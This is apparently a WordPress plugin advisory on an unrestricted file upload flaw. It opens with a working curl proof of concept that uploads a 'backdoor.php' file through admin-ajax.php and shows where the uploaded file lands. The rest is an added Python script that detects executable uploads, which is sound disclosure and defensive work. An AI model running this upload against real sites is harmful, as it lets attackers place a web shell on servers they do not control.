The "upload_file()" AJAX function is affected by an unrestricted file upload vulnerability.
curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.example.com/wp-admin/admin-ajax.php

Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}

http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php
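A defender-side check for the condition shown above, as an added example that is not part of the original advisory or the plugin's code: it walks an upload directory such as wp-content/uploads/contact_files and reports stored files whose names carry a PHP-executable extension. The extension list, the function names and the sample file names other than the one in the response above are assumptions.

```python
import os
import re
import tempfile

# Extensions that PHP handlers are commonly configured to execute
# (assumed list; align it with the web server's actual handler config).
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Stored names in the response above look like "<unix timestamp>-<original name>".
STORED_NAME = re.compile(r"^(\d{10})-(.+)$")


def find_executable_uploads(upload_dir):
    """Return sorted (relative path, upload timestamp or None) for risky files.

    An executable extension is flagged in any position, because some Apache
    handler configurations also execute names such as "photo.php.jpg".
    """
    hits = []
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            extensions = name.lower().split(".")[1:]
            if not EXEC_EXT.intersection(extensions):
                continue
            match = STORED_NAME.match(name)
            stamp = int(match.group(1)) if match else None
            rel = os.path.relpath(os.path.join(root, name), upload_dir)
            hits.append((rel, stamp))
    return sorted(hits)


def demo():
    # Constructed sample tree standing in for wp-content/uploads/contact_files.
    names = ("1427927588-backdoor.php", "1427927601-resume.pdf",
             "1427927655-photo.PHP.jpg", "shell.phtml", "notes.txt")
    with tempfile.TemporaryDirectory() as d:
        for name in names:
            open(os.path.join(d, name), "w").close()
        return find_executable_uploads(d)


if __name__ == "__main__":
    for path, stamp in demo():
        print(path, stamp)
```

The timestamp prefix of each hit gives a starting point for correlating with POST requests to admin-ajax.php in the web server access log.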